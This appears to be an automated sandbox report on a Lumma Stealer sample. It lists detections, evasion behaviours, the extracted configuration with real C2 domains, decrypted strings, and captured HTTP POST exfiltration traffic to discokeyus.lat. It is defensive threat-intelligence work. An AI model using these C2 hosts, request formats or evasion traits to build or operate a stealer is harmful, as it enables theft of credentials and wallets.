Windows Analysis Report
zhQFKte2vX.exe

Overview

General Information

Sample name: zhQFKte2vX.exe (renamed because the original name is a hash value)
Original sample name: 157a5af38553ccb117f6d278b2b046f0.exe
Analysis ID: 1578956
MD5: 157a5af38553ccb117f6d278b2b046f0
SHA1: 9793935e64772bb6fa3665d090fb7e9d448ad438
SHA256: a0d75064673f21a234d5556762f77ee96daad893e015824d7526cb965df0dd44
Tags: exe, user-abuse_ch

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to detect virtual machines (SLDT)
Detected potential crypto function
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • zhQFKte2vX.exe (PID: 4208 cmdline: "C:\Users\user\Desktop\zhQFKte2vX.exe" MD5: 157A5AF38553CCB117F6D278B2B046F0)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs / Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["rapeflowwj.lat", "discokeyus.lat", "grannyejh.lat", "sweepyribs.lat", "energyaffai.lat", "necklacebudi.lat", "sustainskelet.lat", "aspecteirs.lat", "crosshuaht.lat"], "Build id": "PsFKDg--pablo"}
Source | Rule | Description | Author
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security

Source | Rule | Description | Author
Process Memory Space: zhQFKte2vX.exe PID: 4208 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
Process Memory Space: zhQFKte2vX.exe PID: 4208 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Process Memory Space: zhQFKte2vX.exe PID: 4208 | JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security
decrypted.memstr | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security

No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-20T17:05:36.797002+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49704 | 172.67.197.170 | 443 | TCP
2024-12-20T17:05:41.982787+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49705 | 172.67.197.170 | 443 | TCP
2024-12-20T17:05:44.690217+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49706 | 172.67.197.170 | 443 | TCP
2024-12-20T17:05:47.219346+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49707 | 172.67.197.170 | 443 | TCP
2024-12-20T17:05:49.655708+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49709 | 172.67.197.170 | 443 | TCP
2024-12-20T17:05:53.248920+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49712 | 172.67.197.170 | 443 | TCP
2024-12-20T17:05:56.652841+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49713 | 172.67.197.170 | 443 | TCP
2024-12-20T17:06:03.121052+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49714 | 172.67.197.170 | 443 | TCP
2024-12-20T17:05:40.756321+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.7 | 49704 | 172.67.197.170 | 443 | TCP
2024-12-20T17:05:42.845349+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.7 | 49705 | 172.67.197.170 | 443 | TCP
2024-12-20T17:05:40.756321+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.7 | 49704 | 172.67.197.170 | 443 | TCP
2024-12-20T17:05:42.845349+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.7 | 49705 | 172.67.197.170 | 443 | TCP
2024-12-20T17:05:36.797002+0100 | 2058361 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49704 | 172.67.197.170 | 443 | TCP
2024-12-20T17:05:41.982787+0100 | 2058361 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49705 | 172.67.197.170 | 443 | TCP
2024-12-20T17:05:44.690217+0100 | 2058361 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49706 | 172.67.197.170 | 443 | TCP
2024-12-20T17:05:47.219346+0100 | 2058361 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49707 | 172.67.197.170 | 443 | TCP
2024-12-20T17:05:49.655708+0100 | 2058361 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49709 | 172.67.197.170 | 443 | TCP
2024-12-20T17:05:53.248920+0100 | 2058361 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49712 | 172.67.197.170 | 443 | TCP
2024-12-20T17:05:56.652841+0100 | 2058361 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49713 | 172.67.197.170 | 443 | TCP
2024-12-20T17:06:03.121052+0100 | 2058361 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49714 | 172.67.197.170 | 443 | TCP
2024-12-20T17:05:35.428603+0100 | 2058360 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 63618 | 1.1.1.1 | 53 | UDP
2024-12-20T17:05:35.285027+0100 | 2058364 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 59759 | 1.1.1.1 | 53 | UDP
2024-12-20T17:05:35.140726+0100 | 2058378 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 50706 | 1.1.1.1 | 53 | UDP
2024-12-20T17:05:48.188607+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49707 | 172.67.197.170 | 443 | TCP

              AV Detection

Source: zhQFKte2vX.exe | Avira: detected
Source: zhQFKte2vX.exe.4208.0.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": ["rapeflowwj.lat", "discokeyus.lat", "grannyejh.lat", "sweepyribs.lat", "energyaffai.lat", "necklacebudi.lat", "sustainskelet.lat", "aspecteirs.lat", "crosshuaht.lat"], "Build id": "PsFKDg--pablo"}
Source: zhQFKte2vX.exe | ReversingLabs: Detection: 65%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: zhQFKte2vX.exe | Joe Sandbox ML: detected
Source: 00000000.00000003.1468581716.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: rapeflowwj.lat
Source: 00000000.00000003.1468581716.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: crosshuaht.lat
Source: 00000000.00000003.1468581716.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: sustainskelet.lat
Source: 00000000.00000003.1468581716.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: aspecteirs.lat
Source: 00000000.00000003.1468581716.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: energyaffai.lat
Source: 00000000.00000003.1468581716.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: necklacebudi.lat
Source: 00000000.00000003.1468581716.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: discokeyus.lat
Source: 00000000.00000003.1468581716.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: grannyejh.lat
Source: 00000000.00000003.1468581716.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: sweepyribs.lat
Source: 00000000.00000003.1468581716.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000003.1468581716.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000000.00000003.1468581716.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: - Screen Resoluton:
Source: 00000000.00000003.1468581716.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000000.00000003.1468581716.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: Workgroup: -
Source: 00000000.00000003.1468581716.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp | String decryptor: PsFKDg--pablo
Source: zhQFKte2vX.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.7:49704 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.7:49705 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.7:49706 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.7:49707 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.7:49709 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.7:49712 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.7:49713 version: TLS 1.2

              Networking

Source: Network traffic | Suricata IDS: 2058378 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) : 192.168.2.7:50706 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058360 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat) : 192.168.2.7:63618 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.7:49705 -> 172.67.197.170:443
Source: Network traffic | Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.7:49709 -> 172.67.197.170:443
Source: Network traffic | Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.7:49704 -> 172.67.197.170:443
Source: Network traffic | Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.7:49714 -> 172.67.197.170:443
Source: Network traffic | Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.7:49712 -> 172.67.197.170:443
Source: Network traffic | Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.7:49707 -> 172.67.197.170:443
Source: Network traffic | Suricata IDS: 2058364 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) : 192.168.2.7:59759 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.7:49706 -> 172.67.197.170:443
Source: Network traffic | Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.7:49713 -> 172.67.197.170:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49704 -> 172.67.197.170:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49704 -> 172.67.197.170:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49707 -> 172.67.197.170:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49705 -> 172.67.197.170:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49705 -> 172.67.197.170:443
Source: Malware configuration extractor | URLs: rapeflowwj.lat
Source: Malware configuration extractor | URLs: discokeyus.lat
Source: Malware configuration extractor | URLs: grannyejh.lat
Source: Malware configuration extractor | URLs: sweepyribs.lat
Source: Malware configuration extractor | URLs: energyaffai.lat
Source: Malware configuration extractor | URLs: necklacebudi.lat
Source: Malware configuration extractor | URLs: sustainskelet.lat
Source: Malware configuration extractor | URLs: aspecteirs.lat
Source: Malware configuration extractor | URLs: crosshuaht.lat
Source: Joe Sandbox View | IP Address: 172.67.197.170 172.67.197.170
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49705 -> 172.67.197.170:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49709 -> 172.67.197.170:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49704 -> 172.67.197.170:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49712 -> 172.67.197.170:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49714 -> 172.67.197.170:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49707 -> 172.67.197.170:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49706 -> 172.67.197.170:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49713 -> 172.67.197.170:443
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: discokeyus.lat
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 47
    Host: discokeyus.lat
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=5QXR01HVP5LF9RR6L2B
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 12850
    Host: discokeyus.lat
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=SJYCOTWQ7D4WOJWAAFB
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 15082
    Host: discokeyus.lat
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=ERVH1N0HJQ8CFI
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 20377
    Host: discokeyus.lat
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=Z384R315D
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 1171
    Host: discokeyus.lat
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=V2B0YK8QWEUAT
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 551360
    Host: discokeyus.lat
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: sweepyribs.lat
Source: global traffic | DNS traffic detected: DNS query: grannyejh.lat
Source: global traffic | DNS traffic detected: DNS query: discokeyus.lat
Source: unknown | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: discokeyus.lat
Source: zhQFKte2vX.exe, 00000000.00000003.1601429627.0000000005B44000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: zhQFKte2vX.exe, 00000000.00000003.1601429627.0000000005B44000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: zhQFKte2vX.exe, 00000000.00000003.1673104494.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1549421174.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1638145543.00000000011F1000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1668518553.000000000122A000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1672438944.00000000011F1000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1549507523.0000000001200000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1637773020.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1668435335.00000000011F1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro
Source: zhQFKte2vX.exe, 00000000.00000003.1601429627.0000000005B44000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: zhQFKte2vX.exe, 00000000.00000003.1601429627.0000000005B44000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: zhQFKte2vX.exe, 00000000.00000003.1601429627.0000000005B44000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: zhQFKte2vX.exe, 00000000.00000003.1601429627.0000000005B44000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: zhQFKte2vX.exe, 00000000.00000003.1601429627.0000000005B44000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: zhQFKte2vX.exe, 00000000.00000003.1601429627.0000000005B44000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: zhQFKte2vX.exe, 00000000.00000003.1601429627.0000000005B44000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: zhQFKte2vX.exe, 00000000.00000003.1601429627.0000000005B44000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
Source: zhQFKte2vX.exe, 00000000.00000003.1601429627.0000000005B44000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
Source: zhQFKte2vX.exe, 00000000.00000003.1551457939.0000000005B5C000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1551339414.0000000005B5C000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1551269442.0000000005B5F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: zhQFKte2vX.exe, 00000000.00000003.1603096089.000000000126C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
Source: zhQFKte2vX.exe, 00000000.00000003.1634896746.0000000001269000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1634336776.0000000001269000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1668244427.0000000001269000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta
Source: zhQFKte2vX.exe, 00000000.00000003.1551457939.0000000005B5C000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1551339414.0000000005B5C000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1551269442.0000000005B5F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: zhQFKte2vX.exe, 00000000.00000003.1551457939.0000000005B5C000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1551339414.0000000005B5C000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1551269442.0000000005B5F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: zhQFKte2vX.exe, 00000000.00000003.1551457939.0000000005B5C000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1551339414.0000000005B5C000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1551269442.0000000005B5F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: zhQFKte2vX.exe, 00000000.00000003.1603096089.000000000126C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: zhQFKte2vX.exe, 00000000.00000003.1634896746.0000000001269000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1634336776.0000000001269000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1668244427.0000000001269000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: zhQFKte2vX.exe, 00000000.00000002.1751816178.0000000001248000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000002.1751718240.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1600764819.0000000005B1F000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1549254762.00000000011DC000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1577738740.0000000005B1A000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1602483540.0000000005B22000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1750136047.00000000011F0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://discokeyus.lat/
Source: zhQFKte2vX.exe, 00000000.00000002.1751816178.0000000001248000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://discokeyus.lat/%
Source: zhQFKte2vX.exe, 00000000.00000003.1634959757.0000000005B21000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1634272116.0000000005B1D000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1634918161.0000000005B1F000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1635272456.0000000005B22000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1634525610.0000000005B1D000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1634806498.0000000005B1D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discokeyus.lat/&
Source: zhQFKte2vX.exe, 00000000.00000003.1750136047.00000000011F0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://discokeyus.lat/api
Source: zhQFKte2vX.exe, 00000000.00000002.1753601900.0000000005B2D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discokeyus.lat/api0
Source: zhQFKte2vX.exe, 00000000.00000003.1668435335.00000000011F1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://discokeyus.lat/apia
Source: zhQFKte2vX.exe, 00000000.00000003.1637662303.0000000001259000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://discokeyus.lat/apirS
Source: zhQFKte2vX.exe, 00000000.00000003.1549254762.00000000011C3000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000002.1751540442.00000000011C3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://discokeyus.lat:443/api
Source: zhQFKte2vX.exe, 00000000.00000003.1637773020.00000000011C3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://discokeyus.lat:443/apiLocal
Source: zhQFKte2vX.exe, 00000000.00000003.1750136047.00000000011C3000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000002.1751540442.00000000011C3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://discokeyus.lat:443/apifu7wner3.default-release/key4.dbPK
Source: zhQFKte2vX.exe, 00000000.00000003.1551457939.0000000005B5C000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1551339414.0000000005B5C000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1551269442.0000000005B5F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: zhQFKte2vX.exe, 00000000.00000003.1551457939.0000000005B5C000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1551339414.0000000005B5C000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1551269442.0000000005B5F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
